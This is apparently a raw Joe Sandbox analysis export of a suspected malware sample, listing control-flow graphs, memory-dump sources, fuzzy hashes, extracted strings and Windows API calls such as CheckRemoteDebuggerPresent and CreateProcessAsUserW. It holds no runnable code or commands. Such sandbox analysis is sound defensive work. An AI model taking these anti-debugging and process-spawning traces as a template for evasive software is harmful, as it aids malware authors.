78423->78427 78425 6122a30 78425->78392 78426->78425 78427->78425 78429 6122a59 78428->78429 78434 6123e6e 78428->78434 78429->78413 78432 6122a59 78431->78432 78433 6123e6e 2 API calls 78431->78433 78432->78413 78433->78432 78435 6123e8b 78434->78435 78439 6123eb0 78435->78439 78443 6123ea0 78435->78443 78436 6123e9a 78436->78429 78440 6123ef2 78439->78440 78442 6123ef9 78439->78442 78441 6123f4a CallWindowProcW 78440->78441 78440->78442 78441->78442 78442->78436 78444 6123eb0 78443->78444 78445 6123ef9 78444->78445 78446 6123f4a CallWindowProcW 78444->78446 78445->78436 78446->78445 78345 4feca40 78346 4feca86 GetCurrentProcess 78345->78346 78348 4fecad8 GetCurrentThread 78346->78348 78349 4fecad1 78346->78349 78350 4fecb0e 78348->78350 78351 4fecb15 GetCurrentProcess 78348->78351 78349->78348 78350->78351 78352 4fecb4b 78351->78352 78356 4fed028 78352->78356 78354 4fecba4 78359 4fecc54 78356->78359 78360 4fed090 DuplicateHandle 78359->78360 78361 4fecb73 GetCurrentThreadId 78360->78361 78361->78354

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 98 75706e0-75706ff 99 7570705-757070b 98->99 100 75708ad-75708fe 98->100 101 757070d-7570714 99->101 102 757074c-7570760 99->102 124 7570900-757090d 100->124 125 7570918-7570932 100->125 106 7570716-7570723 101->106 107 757072e-7570747 call 7570164 101->107 103 7570782-757078b 102->103 104 7570762-7570766 102->104 109 75707a5-75707c1 103->109 110 757078d-757079a 103->110 104->103 108 7570768-7570774 104->108 106->107 107->102 108->103 118 7570776-757077c 108->118 122 75707c7-75707d2 109->122 123 7570869-757088d 109->123 110->109 118->103 131 75707d4-75707da 122->131 132 75707ea-75707f1 122->132 133 7570897 123->133 134 757088f 123->134 124->125 135 7570934-757093b 125->135 136 7570979-7570980 125->136 137 75707de-75707e0 131->137 138 75707dc 131->138 139 7570805-7570828 132->139 140 75707f3-75707fd 132->140 133->100 134->133 143 7570955-757096a 135->143 144 757093d-757094a 135->144 141 7570982-757098f 136->141 142 757099a-75709a3 136->142 137->132 138->132 150 757082a-7570837 139->150 151 7570839-757084a 139->151 140->139 141->142 147 75709a5-75709a7 142->147 148 75709a9-75709ac 142->148 143->136 155 757096c-7570973 143->155 144->143 152 75709ad-75709b1 147->152 148->152 150->151 160 7570857-7570863 150->160 151->160 161 757084c-757084f 151->161 159 75709b9-75709be 152->159 155->136 156 7570a07-7570a32 155->156 172 7570a39-7570a9a 156->172 162 7570a01-7570a04 159->162 163 75709c0-75709c7 159->163 160->122 160->123 161->160 165 75709e1-75709f6 163->165 166 75709c9-75709d6 163->166 165->162 171 75709f8-75709ff 165->171 166->165 171->162 171->172 180 7570ab2-7570ab8 172->180 181 7570a9c-7570aaf 172->181 182 7570aba-7570ac1 180->182 183 7570b28-7570b80 180->183 184 7570b87-7570bdf 182->184 185 7570ac7-7570ad7 182->185 183->184 190 7570be6-7570c44 184->190 185->190 191 7570add-7570ae1 185->191 221 7570c4a-7570c5b 190->221 194 7570ae4-7570ae6 191->194 197 7570b0b-7570b0d 194->197 198 7570ae8-7570af8 194->198 200 7570b0f-7570b19 197->200 201 7570b1c-7570b25 197->201 206 7570ae3 198->206 207 7570afa-7570b09 198->207 206->194 207->197 207->206 224 7570c5c 221->224 224->221 225 7570c5e-7570cd4 224->225 225->224 235 7570cd6-7570cf4 225->235 236 7570d46-7570d9e 235->236 237 7570cf6-7570d06 235->237 240 7570da5-7570eb2 236->240 237->240 241 7570d0c-7570d10 237->241 275 7570eb4-7570ec7 240->275 276 7570eca-7570ed0 240->276 243 7570d13-7570d15 241->243 244 7570d17-7570d27 243->244 245 7570d29-7570d2b 243->245 244->245 252 7570d12 244->252 247 7570d2d-7570d37 245->247 248 7570d3a-7570d43 245->248 252->243 277 7570ed2-7570ed9 276->277 278 7570f4a-7570fa2 276->278 280 7570edf-7570ee3 277->280 281 7570fa9-7571001 277->281 278->281 282 7570ee9-7570eed 280->282 283 7571008-757110c 280->283 281->283 285 7570ef0-7570efd 282->285 328 757110e-7571112 283->328 329 7571168-75711c0 283->329 292 7570f22-7570f2f 285->292 293 7570eff-7570f0f 285->293 300 7570f31-7570f3b 292->300 301 7570f3e-7570f47 292->301 302 7570f11-7570f20 293->302 303 7570eef 293->303 302->292 302->303 303->285 330 75711c7-75712c8 328->330 331 7571118-757111c 328->331 329->330 367 75712cc-75712ce 330->367 368 75712ca 330->368 333 757111f-757112c 331->333 337 7571140-757114d 333->337 338 757112e-757113e 333->338 346 757114f-7571159 337->346 347 757115c-7571165 337->347 338->337 345 757111e 338->345 345->333 369 75712d8-75712d9 367->369 368->369
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1973308421.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7570000_5qJ6QQTcRS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: (q$Hq$Hq$Hq$Hq$Hq$Hq
                                                                                                              • API String ID: 0-429948283
                                                                                                              • Opcode ID: 7672ca28cbab8ad1d96aa4c3e724399f266ca2d5094a3e1c1e585cbcb3835702
                                                                                                              • Instruction ID: 60b576fa251a4a43adfaffdf8ee940249f75761b833a96b34212be7e81d3e449
                                                                                                              • Opcode Fuzzy Hash: 7672ca28cbab8ad1d96aa4c3e724399f266ca2d5094a3e1c1e585cbcb3835702
                                                                                                              • Instruction Fuzzy Hash: 7572CE707002158FDB08AB39D8547AE77A6FFC9360F248569E50ADB3A1DE34DC42CBA5

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 514 7635c90-7635f5f 548 7637fa7-76382c6 514->548 549 7635f65-7636cc9 514->549 624 7639275-763a150 548->624 625 76382cc-763926d 548->625 960 7636ccf-7637004 549->960 961 763700c-7637f9f 549->961 1182 763a156-763a477 624->1182 1183 763a47f-763a492 624->1183 625->624 960->961 961->548 1182->1183 1188 763a498-763aaa6 1183->1188 1189 763aaae-763b925 call 763d008 1183->1189 1188->1189 1570 763b92b-763b932 1189->1570
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1973434926.0000000007630000.00000040.00000800.00020000.00000000.sdmp, Offset: 07630000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7630000_5qJ6QQTcRS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: e9a21b138ba325f2af2fe43f69436ff0272d954c2d703367799094c5cf087eb0
                                                                                                              • Instruction ID: 685552be7460e296d8bd618608a5990cdca0562f26f5146dce3ca3d5f20af020
                                                                                                              • Opcode Fuzzy Hash: e9a21b138ba325f2af2fe43f69436ff0272d954c2d703367799094c5cf087eb0
                                                                                                              • Instruction Fuzzy Hash: E1B33470A01628CFCB58EF38DD952ACBBB2BF89301F0085E9D489A7254DB355E95CF85

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 1572 7574e58-757a61e call 757bea8 2542 757a624-757a62b 1572->2542
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1973308421.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7570000_5qJ6QQTcRS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: fdc06a322283c3e28238c67fea2f021b69fa300c3b5c3b158877e1276c73f95c
                                                                                                              • Instruction ID: 8098b86a2aa70cc9d17538a386e1f08b29fe464fe117d39686e2b0b6edadccdb
                                                                                                              • Opcode Fuzzy Hash: fdc06a322283c3e28238c67fea2f021b69fa300c3b5c3b158877e1276c73f95c
                                                                                                              • Instruction Fuzzy Hash: AAB32670A01618CFDB54BF38E9996ACBBF2FB88301F4085E9D089A7250DF355999DF84

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 2544 791e368-791e38d 2545 791e394-791e3b8 2544->2545 2546 791e38f 2544->2546 2547 791e3b9 2545->2547 2546->2545 2548 791e3c0-791e3dc 2547->2548 2549 791e3e5-791e3e6 2548->2549 2550 791e3de 2548->2550 2563 791e60b-791e614 2549->2563 2550->2547 2550->2549 2551 791e411-791e422 2550->2551 2552 791e515 2550->2552 2553 791e438-791e440 2550->2553 2554 791e4da-791e50d call 791c560 2550->2554 2555 791e5fd-791e606 2550->2555 2556 791e53e-791e541 2550->2556 2557 791e47e-791e496 2550->2557 2558 791e560-791e578 2550->2558 2559 791e4c2-791e4d5 2550->2559 2560 791e5e6-791e5f8 2550->2560 2561 791e5ab-791e5de call 7917cf8 2550->2561 2562 791e3eb-791e40f 2550->2562 2550->2563 2581 791e442-791e444 2551->2581 2582 791e424-791e436 2551->2582 2567 791e51e-791e539 2552->2567 2565 791e447-791e452 2553->2565 2554->2552 2555->2548 2569 791e54a-791e55b 2556->2569 2577 791e4a9-791e4b0 2557->2577 2578 791e498-791e4a7 2557->2578 2579 791e58b-791e592 2558->2579 2580 791e57a-791e589 2558->2580 2559->2548 2560->2548 2561->2560 2562->2548 2574 791e465-791e46c 2565->2574 2575 791e454-791e463 2565->2575 2567->2548 2569->2548 2583 791e473-791e479 2574->2583 2575->2583 2584 791e4b7-791e4bd 2577->2584 2578->2584 2585 791e599-791e5a6 2579->2585 2580->2585 2581->2565 2582->2548 2583->2548 2584->2548 2585->2548
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1973711422.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7910000_5qJ6QQTcRS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: e\1$e\1$"*p$"*p
                                                                                                              • API String ID: 0-1513742261
                                                                                                              • Opcode ID: 33c009cdaeee6cf6f28f12c62c102380c6f6a87ad0c9fd348b40403873ea1b30
                                                                                                              • Instruction ID: 70a93fc106a8e1cbf77ace37e13d106c4f9753fc705300ae1145ae5525fb5f3e
                                                                                                              • Opcode Fuzzy Hash: 33c009cdaeee6cf6f28f12c62c102380c6f6a87ad0c9fd348b40403873ea1b30
                                                                                                              • Instruction Fuzzy Hash: 318112B0D012598FCB14CFA9D5446EEFBF2BF89305F20982AD812BB254D7749912CF54

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 2590 7636857-7636cc9 2638 7636ccf-7637004 2590->2638 2639 763700c-76382c6 2590->2639 2638->2639 2891 7639275-763a150 2639->2891 2892 76382cc-763926d 2639->2892 3239 763a156-763a477 2891->3239 3240 763a47f-763a492 2891->3240 2892->2891 3239->3240 3243 763a498-763aaa6 3240->3243 3244 763aaae-763b925 call 763d008 3240->3244 3243->3244 3510 763b92b-763b932 3244->3510
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1973434926.0000000007630000.00000040.00000800.00020000.00000000.sdmp, Offset: 07630000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7630000_5qJ6QQTcRS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 29c34d4aacead45af6abb5a258a994c8cfc52b7c25d1604fdfdee9a22e5e3b82
                                                                                                              • Instruction ID: 8194e8edda2200140cf45d6e5d455d78c6c866539c093b9dc0ef8a91a708ee50
                                                                                                              • Opcode Fuzzy Hash: 29c34d4aacead45af6abb5a258a994c8cfc52b7c25d1604fdfdee9a22e5e3b82
                                                                                                              • Instruction Fuzzy Hash: 06A33470A016288FCB58EF38DD952ACBBB2BF89301F4085E9D489A7254DF345E95CF85

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 3512 7694378-7694489 3525 7694588-769458a 3512->3525 3526 769448f-7694580 3512->3526 3527 769458c-769458f 3525->3527 3528 7694591-76945a0 call 76931f0 3525->3528 3526->3525 3530 76945ce-7694bb8 3527->3530 3535 76945a2-76945a8 3528->3535 3536 76945b5-76945cb 3528->3536 4188 7694bbb call 7697ebd 3530->4188 4189 7694bbb call 7697f00 3530->4189 3540 76945b0-76945b3 3535->3540 3536->3530 3540->3530 3622 7694bbe-7695a75 3799 7695a7b-7695aeb 3622->3799 3800 7697785 3622->3800 4190 7695aed call 76985af 3799->4190 4191 7695aed call 7698620 3799->4191 4192 7695aed call 7698610 3799->4192 4193 7695aed call 76985f2 3799->4193 3802 769778a-76977a6 3800->3802 3805 76977a8-76977bc 3802->3805 3807 76977db-7697804 3805->3807 3808 76977be-76977d8 3805->3808 3809 769785e-769785f 3807->3809 3810 7697806-769781c 3807->3810 3808->3807 3811 7697860-769786d 3809->3811 3810->3805 3813 769781e 3810->3813 3815 7697870-7697880 3811->3815 3813->3811 3814 7697820-769782e 3813->3814 3814->3815 3816 7697830-769785d 3814->3816 3817 7697882-76978cc 3815->3817 3816->3809 3817->3817 3819 76978ce-76978e6 3817->3819 3822 7695af3-7695cca 3843 7695cd0-7695ded 3822->3843 3844 7695df2-7695ec7 3822->3844 3865 7695eca-76974e4 3843->3865 3844->3865 3865->3802 4150 76974ea-7697508 3865->4150 4186 769750a call e26148 4150->4186 4187 769750a call e26158 4150->4187 4151 769750f-769761b 4151->3802 4164 7697621-7697626 4151->4164 4165 7697628-769763a 4164->4165 4166 769763f-769771f 4164->4166 4167 7697754-7697784 4165->4167 4166->3802 4182 7697721-769774e 4166->4182 4182->4167 4186->4151 4187->4151 4188->3622 4189->3622 4190->3822 4191->3822 4192->3822 4193->3822
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1973533465.0000000007690000.00000040.00000800.00020000.00000000.sdmp, Offset: 07690000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7690000_5qJ6QQTcRS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: @
                                                                                                              • API String ID: 0-2766056989
                                                                                                              • Opcode ID: b29193ce5c59696f64b6166938f06a6faf85455a839a6f12a721f82552039f09
                                                                                                              • Instruction ID: fc59bc40aa4673bb32fcf669d542f723b35f4a0559cd2f018c567d80f2a312e4
                                                                                                              • Opcode Fuzzy Hash: b29193ce5c59696f64b6166938f06a6faf85455a839a6f12a721f82552039f09
                                                                                                              • Instruction Fuzzy Hash: 8F53AD70A182288FCB14EF78D99479DBBB5BF89300F4085EDD489A7250DB385E89CF59
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1964375284.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_e20000_5qJ6QQTcRS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: ,q$,q
                                                                                                              • API String ID: 0-1667412543
                                                                                                              • Opcode ID: 643b7fa79951358896eb3d14ea005b4e53151a5f62b6ef5c6a75294a59052203
                                                                                                              • Instruction ID: 4bf780011256113dbacf9b4144b63e4c6cf13208ab189f4b4efc2c0c2b75159b
                                                                                                              • Opcode Fuzzy Hash: 643b7fa79951358896eb3d14ea005b4e53151a5f62b6ef5c6a75294a59052203
                                                                                                              • Instruction Fuzzy Hash: E8824D30A01219DFCB14CF64EA84AAEBBF2FF88314F159559E405EB2A1DB74ED41CB91

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 5286 e27d00-e27d23 5287 e27d25-e27d2b 5286->5287 5288 e27d2e-e27d4e 5286->5288 5287->5288 5291 e27d50 5288->5291 5292 e27d55-e27d5c 5288->5292 5294 e280e4 5291->5294 5293 e27d5e-e27d69 5292->5293 5295 e280f5-e28101 5293->5295 5296 e27d6f-e27d82 5293->5296 5297 e280e5-e280ed 5294->5297 5295->5297 5302 e28103-e28106 5295->5302 5300 e27d84-e27d92 5296->5300 5301 e27d98-e27db3 5296->5301 5300->5301 5305 e2806c-e28073 5300->5305 5306 e27dd7-e27dda 5301->5306 5307 e27db5-e27dbb 5301->5307 5305->5294 5312 e28075-e28077 5305->5312 5308 e27de0-e27de3 5306->5308 5309 e27f34-e27f3a 5306->5309 5310 e27dc4-e27dc7 5307->5310 5311 e27dbd 5307->5311 5308->5309 5313 e27de9-e27def 5308->5313 5314 e27f40-e27f45 5309->5314 5315 e28026-e28029 5309->5315 5316 e27dfa-e27e00 5310->5316 5317 e27dc9-e27dcc 5310->5317 5311->5309 5311->5310 5311->5315 5311->5316 5318 e28086-e2808c 5312->5318 5319 e28079-e2807e 5312->5319 5313->5309 5321 e27df5 5313->5321 5314->5315 5322 e280f0 5315->5322 5323 e2802f-e28035 5315->5323 5324 e27e02-e27e04 5316->5324 5325 e27e06-e27e08 5316->5325 5326 e27dd2 5317->5326 5327 e27e66-e27e6c 5317->5327 5318->5295 5320 e2808e-e28093 5318->5320 5319->5318 5328 e28095-e2809a 5320->5328 5329 e280d8-e280db 5320->5329 5321->5315 5322->5295 5330 e28037-e2803f 5323->5330 5331 e2805a-e2805e 5323->5331 5332 e27e12-e27e1b 5324->5332 5325->5332 5326->5315 5327->5315 5333 e27e72-e27e78 5327->5333 5328->5322 5334 e2809c 5328->5334 5329->5322 5341 e280dd-e280e2 5329->5341 5330->5295 5337 e28045-e28054 5330->5337 5331->5305 5340 e28060-e28066 5331->5340 5338 e27e2e-e27e56 5332->5338 5339 e27e1d-e27e28 5332->5339 5335 e27e7a-e27e7c 5333->5335 5336 e27e7e-e27e80 5333->5336 5342 e280a3-e280a8 5334->5342 5343 e27e8a-e27ea1 5335->5343 5336->5343 5337->5301 5337->5331 5361 e27f4a-e27f80 5338->5361 5362 e27e5c-e27e61 5338->5362 5339->5315 5339->5338 5340->5293 5340->5305 5341->5294 5341->5312 5344 e280ca-e280cc 5342->5344 5345 e280aa-e280ac 5342->5345 5354 e27ea3-e27ebc 5343->5354 5355 e27ecc-e27ef3 5343->5355 5344->5322 5351 e280ce-e280d1 5344->5351 5349 e280bb-e280c1 5345->5349 5350 e280ae-e280b3 5345->5350 5349->5295 5353 e280c3-e280c8 5349->5353 5350->5349 5351->5329 5353->5344 5357 e2809e-e280a1 5353->5357 5354->5361 5365 e27ec2-e27ec7 5354->5365 5355->5322 5367 e27ef9-e27efc 5355->5367 5357->5322 5357->5342 5368 e27f82-e27f86 5361->5368 5369 e27f8d-e27f95 5361->5369 5362->5361 5365->5361 5367->5322 5370 e27f02-e27f2b 5367->5370 5371 e27fa5-e27fa9 5368->5371 5372 e27f88-e27f8b 5368->5372 5369->5322 5373 e27f9b-e27fa0 5369->5373 5370->5361 5385 e27f2d-e27f32 5370->5385 5374 e27fab-e27fb1 5371->5374 5375 e27fc8-e27fcc 5371->5375 5372->5369 5372->5371 5373->5315 5374->5375 5377 e27fb3-e27fbb 5374->5377 5378 e27fd6-e27ff5 call e282e8 5375->5378 5379 e27fce-e27fd4 5375->5379 5377->5322 5380 e27fc1-e27fc6 5377->5380 5382 e27ffb-e27fff 5378->5382 5379->5378 5379->5382 5380->5315 5382->5315 5383 e28001-e2801d 5382->5383 5383->5315 5385->5361
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1964375284.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_e20000_5qJ6QQTcRS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: ,q$,q
                                                                                                              • API String ID: 0-1667412543
                                                                                                              • Opcode ID: 939d96f049d0e4a175ec078c9eb3022647cb27fb467fce659a0de40a789ec0aa
                                                                                                              • Instruction ID: f04256cfff792f8025babc8a4608cace457751bc14ff2e657cc972a7c572870b
                                                                                                              • Opcode Fuzzy Hash: 939d96f049d0e4a175ec078c9eb3022647cb27fb467fce659a0de40a789ec0aa
                                                                                                              • Instruction Fuzzy Hash: 45D11A30A05129DFDB14CFA9E984AAEBBB2FF88304F159069E445B72A5DB31EC45CB50
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1973711422.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7910000_5qJ6QQTcRS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 6f$6f
                                                                                                              • API String ID: 0-3590766845
                                                                                                              • Opcode ID: 77625cfea9c11c120fcacff9f5a1e076c2987e46a09de1f3b726ac01ee72884a
                                                                                                              • Instruction ID: e25840d2363428a22f1d67c9f05d65f8748600becc083ad9b4b118f77a8e4afa
                                                                                                              • Opcode Fuzzy Hash: 77625cfea9c11c120fcacff9f5a1e076c2987e46a09de1f3b726ac01ee72884a
                                                                                                              • Instruction Fuzzy Hash: 0971EFB4E0020C9FDB04DFA9D5856DEBBB2FF89300F20842AE40AAB754EB355955CF51
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1964375284.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_e20000_5qJ6QQTcRS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: Hq
                                                                                                              • API String ID: 0-1594803414
                                                                                                              • Opcode ID: 80639c2d2658063b9ce319f0350e821fa19c42ceedf263dbe7168202285bf8d4
                                                                                                              • Instruction ID: 2c77b125141e67a315fb5c5793d58d67b35ebfd79b1e9e659edb6489dc41486c
                                                                                                              • Opcode Fuzzy Hash: 80639c2d2658063b9ce319f0350e821fa19c42ceedf263dbe7168202285bf8d4
                                                                                                              • Instruction Fuzzy Hash: AF22CD70A042298FDB04DF69D854BAEBBB6FF88304F248569E446EB395DF349D41CB90
                                                                                                              APIs
                                                                                                              • CreateProcessAsUserW.KERNELBASE(?,?,?,0000000A,?,?,?,?,?,?,?), ref: 0791DE0B
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1973711422.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7910000_5qJ6QQTcRS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CreateProcessUser
                                                                                                              • String ID:
                                                                                                              • API String ID: 2217836671-0
                                                                                                              • Opcode ID: 234cee76daec1a98a4386503b0f4e28bfb990f5e9afc5b98fb2b2b69a51a523a
                                                                                                              • Instruction ID: 9e82f93f7916ec55b98f6614e1f13a0f5f2187988b2d71d6f2ce6fc68218482a
                                                                                                              • Opcode Fuzzy Hash: 234cee76daec1a98a4386503b0f4e28bfb990f5e9afc5b98fb2b2b69a51a523a
                                                                                                              • Instruction Fuzzy Hash: 0451E6B1D0022ADFDB24DF59C844BDDBBB5BF48314F0484AAE818B7250DB759A85CF50
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1973711422.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7910000_5qJ6QQTcRS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: kQD
                                                                                                              • API String ID: 0-3066535408
                                                                                                              • Opcode ID: c5097d07e4e83463dacf514bce8a5c2abd52db59737476efadf15d8e3f952950
                                                                                                              • Instruction ID: 0f9206745893382178c9636dd15259e8bf66089b1b7ad0f32c244a638e531947
                                                                                                              • Opcode Fuzzy Hash: c5097d07e4e83463dacf514bce8a5c2abd52db59737476efadf15d8e3f952950
                                                                                                              • Instruction Fuzzy Hash: B6F1A0B1E1821ADFCB04CF99D4824DDFBB2FF4A314B24855AD401EB255D336A992CF94
                                                                                                              APIs
                                                                                                              • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 04FE026F
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1971403525.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_4fe0000_5qJ6QQTcRS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CheckDebuggerPresentRemote
                                                                                                              • String ID:
                                                                                                              • API String ID: 3662101638-0
                                                                                                              • Opcode ID: 02c259bff0511bd00d37cbac820196aa87529bc614afe2c6180addb16abf86b7
                                                                                                              • Instruction ID: 5abb0a2537a546826ea3efd09f9d8d61467ca656b9ed929f410bcee2eef6c017
                                                                                                              • Opcode Fuzzy Hash: 02c259bff0511bd00d37cbac820196aa87529bc614afe2c6180addb16abf86b7
                                                                                                              • Instruction Fuzzy Hash: 382137B1C012598FDB10CF9AD884BEEFBF4EF49310F14841AE859A3251D778A945CF61
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1973711422.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7910000_5qJ6QQTcRS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 6f
                                                                                                              • API String ID: 0-3135077484
                                                                                                              • Opcode ID: 760fb2bd89b7441b5d72d8d5f2217a43f293fe2d20864635ec273e52bbdf1249
                                                                                                              • Instruction ID: 761f85942c0c460404ed040b5553effeeda3a24d8451f887bba243025698fa02
                                                                                                              • Opcode Fuzzy Hash: 760fb2bd89b7441b5d72d8d5f2217a43f293fe2d20864635ec273e52bbdf1249
                                                                                                              • Instruction Fuzzy Hash: 6571E2B4E002089FDB08DFA9D5856DEBBB2FF89300F20852AD40AA7754EB355955CF51
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1973533465.0000000007690000.00000040.00000800.00020000.00000000.sdmp, Offset: 07690000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7690000_5qJ6QQTcRS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: >NG
                                                                                                              • API String ID: 0-1926143806
                                                                                                              • Opcode ID: 3647d1164914e17eb65341de4434bc95885905d898443b5b8efc084c60b5fe9d
                                                                                                              • Instruction ID: d9b4fd423b61b434987e55026caed515b79f42f582615be85d782f061d7c1d29
                                                                                                              • Opcode Fuzzy Hash: 3647d1164914e17eb65341de4434bc95885905d898443b5b8efc084c60b5fe9d
                                                                                                              • Instruction Fuzzy Hash: 43512AB1E1420ACFDB48CFAAC4406EEFBF6BF89301F24916AD41AE7254D7354A41CB64
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1973533465.0000000007690000.00000040.00000800.00020000.00000000.sdmp, Offset: 07690000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7690000_5qJ6QQTcRS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: <
                                                                                                              • API String ID: 0-4251816714
                                                                                                              • Opcode ID: c768dbeb3b8184453ae0d2a5b033445dede53449fe2d9c13a875ba36dcdbc6ae
                                                                                                              • Instruction ID: af758de71af4b3fb59a60790ece38db1932756fd48fc00d1364c2e3d956ff5df
                                                                                                              • Opcode Fuzzy Hash: c768dbeb3b8184453ae0d2a5b033445dede53449fe2d9c13a875ba36dcdbc6ae
                                                                                                              • Instruction Fuzzy Hash: AF51A6B1E01658CFDB58CFAAC9446DDBBF6AFC9300F14C0AAD509AB224DB345A85CF50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1973533465.0000000007690000.00000040.00000800.00020000.00000000.sdmp, Offset: 07690000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7690000_5qJ6QQTcRS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: ee595e05cecd493e1407dd4f8d7fefbab8efe8e7694d34eb13d8d1f253baa45b
                                                                                                              • Instruction ID: a7383351c800680ba759192ee60f6088b6f6682bf7867e8e2be971c8871d6849
                                                                                                              • Opcode Fuzzy Hash: ee595e05cecd493e1407dd4f8d7fefbab8efe8e7694d34eb13d8d1f253baa45b
                                                                                                              • Instruction Fuzzy Hash: 7952D170A042588FCB05EF79D89465EBFF2BF8A300F4585AAD489EB351DB389C45CB91
                                                                                                              Memory Dump Source
